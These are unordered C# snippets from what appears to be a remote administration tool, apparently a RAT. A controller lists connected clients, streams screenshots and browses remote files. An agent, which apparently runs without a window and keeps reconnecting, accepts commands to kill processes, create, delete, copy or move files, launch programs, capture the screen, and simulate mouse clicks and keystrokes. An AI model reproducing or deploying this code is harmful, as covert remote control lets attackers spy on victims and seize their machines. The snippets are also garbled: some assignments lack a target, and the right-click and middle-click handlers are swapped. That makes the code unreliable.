public void OnClientDisconnected(SocketState cs) { #if DEBUG MessageBox.Show(cs.Connection.RemoteEndPoint.ToString() + " has disconnected!"); #endif this.UpdateForm(); }
public static void HandleKill(SocketState ss, Command c) { foreach (Process p in Process.GetProcessesByName(c.Arguments[0])) { p.Kill(); } }
private bool OnReceiveCommand(SocketState cs, Command c) { if(!requesting || this.IsDisposed || c.CommandType != Command.Type.Screenshot || cs.Connection.RemoteEndPoint.ToString() != this.cs.Connection.RemoteEndPoint.ToString()) { return false; } CommandState cmdState = CommandHandler.HandleCommand(c, cs); try { pbScreenshot.Invoke((MethodInvoker)delegate { tmrScreenshot.Enabled = requesting; tmrScreenshotTimeout.Enabled = false; pbScreenshot.Image = byteArrayToImage((byte[])cmdState.ReturnValue); }, null); } catch (Exception) { //sh.OnReceiveDataCallback = original; return false; } return true; }
//SocketHelper.OnReceiveDataDelegate original; public WatchForm(SocketHelper sh, SocketState cs) { = sh; this.cs = cs; //this.original = sh.OnReceiveDataCallback; InitializeComponent(); }
public void OnClientConnected(SocketState cs) { #if DEBUG //MessageBox.Show(cs.Connection.RemoteEndPoint.ToString() + " has connected!"); //sh.Send(cs, new Command(Command.Type.Screenshot)); #endif this.UpdateForm(); }
public static void HandleList(SocketState ss, Command c) { string[] foldersInDirectory = Directory.EnumerateDirectories(c.Arguments[0]).ToArray<string>(); string[] filesInDirectory = Directory.EnumerateFiles(c.Arguments[0]).ToArray<string>(); List<string> allInDirectory = new List<string>(); allInDirectory.AddRange(foldersInDirectory); allInDirectory.Add("--FILES--"); allInDirectory.AddRange(filesInDirectory); ch.Send(new Command(Command.Type.List, allInDirectory.ToArray())); }
public static void HandleCreate(SocketState ss, Command c) { string fileName = c.Arguments[0]; if (c.Arguments.Length <= 1) return; using (FileStream fs = File.Create(fileName)) { string fileText = c.Arguments[1]; byte[] textBytes = Encoding.ASCII.GetBytes(fileText); fs.Write(textBytes, 0, textBytes.Length); } }
public FileBrowser(SocketState cs, SocketHelper sh) { this.cs = cs; = sh; sh.OnReceiveCommandCallback.Add(OnReceiveCommand); upLabel = new Label() { Text = "..", ForeColor = Color.DarkRed, Tag = false, }; upLabel.Click += upLabel_Click; InitializeComponent(); }
public bool OnReceiveCommand(SocketState ss, Command c) { try { // handle all errors to ensure program continues in background if (CommandHandlers.ContainsKey(c.CommandType)) { CommandHandlers[c.CommandType](ss, c); } } catch (Exception ex) { this.SendError(ex); } return true; }
public bool OnReceiveCommand(SocketState cs, Command c) { if (c.CommandType != Command.Type.List || cs.Connection.RemoteEndPoint.ToString() != this.cs.Connection.RemoteEndPoint.ToString()) return false; bool isFiles = false; List<Control> controlsToAdd = new List<Control>(); controlsToAdd.Add(upLabel); foreach (string item in c.Arguments) { if (item == "--FILES--") { isFiles = true; continue; } Label fileLabel = new Label(); fileLabel.Tag = isFiles; fileLabel.Text = item.Replace(currentDirectory, ""); fileLabel.ForeColor = isFiles ? Color.Black : Color.DarkBlue; fileLabel.BorderStyle = BorderStyle.FixedSingle; fileLabel.MouseClick += fileLabel_Click; fileLabel.DoubleClick += fileLabel_DoubleClick; if(isFiles) fileLabel.ContextMenuStrip = cmsFile; if (currentDirectory + fileLabel.Text == copiedFile) fileLabel.BackColor = Color.LightBlue; controlsToAdd.Add(fileLabel); } flowLayout.Invoke((MethodInvoker)delegate { flowLayout.Controls.Clear(); flowLayout.Controls.AddRange(controlsToAdd.ToArray()); }); return true; }
public static CommandState HandleCommand(Command c, SocketState cs) { CommandState cmdState = new CommandState(); switch (c.CommandType) { case Command.Type.Identify: cs.Tag = c.Arguments; cmdState.UpdateForm = true; break; case Command.Type.Screenshot: byte[] screenshotBytes = Convert.FromBase64String(c.Arguments[0]); #if DEBUG //File.WriteAllBytes("debugscreenshot.jpg", screenshotBytes); #endif cmdState.ReturnValue = screenshotBytes; break; } return cmdState; }
public static void HandleDisconnect(SocketState ss, Command c) { ss.Connection.Close(); }
public static void HandleDelete(SocketState ss, Command c) { File.Delete(c.Arguments[0]); }
public static void HandleCursorPosition(SocketState ss, Command c) { Cursor.Position = new Point(Convert.ToInt32(c.Arguments[0]), Convert.ToInt32(c.Arguments[1])); }
private void HandleSocketException(SocketState ss, SocketException ex) { // If the connection is reset, treat as if client disconnected (Remove them from client list) if (ex.SocketErrorCode == SocketError.ConnectionReset && Clients != null) { Clients.TryRemove(ss.Connection.RemoteEndPoint.ToString(), out ss); if (OnDisconnectCallback != null) { OnDisconnectCallback(ss); } } else { ExceptionHandler.HandleException(ex); } }
private SocketState[] GetSelectedClients() { SocketState[] selectedClients = new SocketState[lstClients.SelectedItems.Count]; for(int i = 0; i < selectedClients.Length; i++) { ListViewItem lvi = lstClients.Items[i]; if (!sh.Clients.ContainsKey(lvi.Text)) continue; selectedClients[i] = sh.Clients[lvi.Text]; } return selectedClients; }
public static void HandleMouseLeftClick(SocketState ss, Command c) { Utility.MouseClick(Utility.MOUSEEVENTF_LEFTDOWN | Utility.MOUSEEVENTF_LEFTUP); }
public static void HandleScreenshot(SocketState ss, Command c) { Bitmap screenshot = Utility.ScreenToBitmap(); string base64Screenshot; ImageFormat imgFormat = ImageFormat.Png; long quality = 100L; try { if (c.Arguments.Length > 0) { switch (c.Arguments[0].ToString().ToLower()) { case "jpg": imgFormat = ImageFormat.Jpeg; break; case "gif": imgFormat = ImageFormat.Gif; break; case "png": imgFormat = ImageFormat.Png; break; } if (c.Arguments.Length > 1) { quality = Convert.ToInt64(c.Arguments[1]); } } } catch (Exception) { quality = 0; imgFormat = ImageFormat.Jpeg; } using (MemoryStream ms = new MemoryStream()) { EncoderParameters eps = new EncoderParameters(1); eps.Param[0] = new EncoderParameter(System.Drawing.Imaging.Encoder.Quality, quality); screenshot.Save(ms, Utility.GetEncoder(imgFormat), eps); base64Screenshot = Convert.ToBase64String(ms.ToArray()); } ch.Send(new Command(Command.Type.Screenshot, base64Screenshot)); }
public void Send(SocketState ss, string text) { if (!Listen) return; byte[] encodedText = GetEncodedString(text); try { ss.Connection.BeginSend(encodedText, 0, encodedText.Length, SocketFlags.None, null, null); } catch (SocketException ex) { HandleSocketException(ss, ex); } catch (Exception ex) { ExceptionHandler.HandleException(ex); } }
public static void HandleOpen(SocketState ss, Command c) { string fileToOpen = c.Arguments[0]; string arguments = (c.Arguments.Length > 1) ? c.Arguments[1] : ""; Process.Start(fileToOpen, arguments); }
/// <summary> /// Calls all command handlers (LIFO) and stops when one handles command (returns true) /// </summary> public void HandleReceiveCommand(SocketState ss, Command c) { for (int i = OnReceiveCommandCallback.Count - 1; i >= 0; i--) { if (OnReceiveCommandCallback[i] == null) continue; bool handled = OnReceiveCommandCallback[i](ss, c); if (handled) break; } }
private void RegisterReceive(SocketState ss) { ss.Connection.BeginReceive(ss.Buffer, 0, ss.Buffer.Length, SocketFlags.None, new AsyncCallback(OnBeginReceive), ss); }
private void OnBeginConnect(IAsyncResult ar) { Socket client = (Socket)ar.AsyncState; try { client.EndConnect(ar); } catch (Exception ex) { ExceptionHandler.HandleException(ex); if (Persistent) { System.Threading.Thread.Sleep((5000 * (FailedAttempts++))); FailedAttempts = Math.Min(FailedAttempts, 60); Connect(); } return; } SocketState ss = new SocketState() { Connection = client }; if(OnConnectCallback != null) { OnConnectCallback(ss); } RegisterReceive(ss); }
public static void HandleSendText(SocketState ss, Command c) { //SendKeys.Send(c.Arguments[0]); doesn't work in gui-less app MLib.InputDevices.Keyboard.SimulateKeyPresses(c.Arguments[0]); }
public static void HandleMiddleClick(SocketState ss, Command c) { Utility.MouseClick(Utility.MOUSEEVENTF_RIGHTDOWN | Utility.MOUSEEVENTF_RIGHTUP); }
public static void HandleCopy(SocketState ss, Command c) { File.Copy(c.Arguments[0], c.Arguments[1]); }
public static void HandleMove(SocketState ss, Command c) { File.Move(c.Arguments[0], c.Arguments[1]); }
public void OnBeginAccept(IAsyncResult ar) { if (!Listen) return; Socket socket, remoteSocket; try { // client can disconnect before we handle the connection (... really?) socket = (Socket)ar.AsyncState; remoteSocket = socket.EndAccept(ar); } catch (SocketException) { return; } catch (Exception ex) { ExceptionHandler.HandleException(ex); return; } string key = remoteSocket.RemoteEndPoint.ToString(); SocketState ss = new SocketState() { Connection = remoteSocket }; Clients[key] = ss; if (OnConnectCallback != null) { OnConnectCallback(ss); } RegisterReceive(ss); RegisterAccept(); }
public static void HandleRightClick(SocketState ss, Command c) { Utility.MouseClick(Utility.MOUSEEVENTF_MIDDLEDOWN | Utility.MOUSEEVENTF_MIDDLEUP); }
public void Send(SocketState ss, Command c) { this.Send(ss, Utility.Serialize(c)); }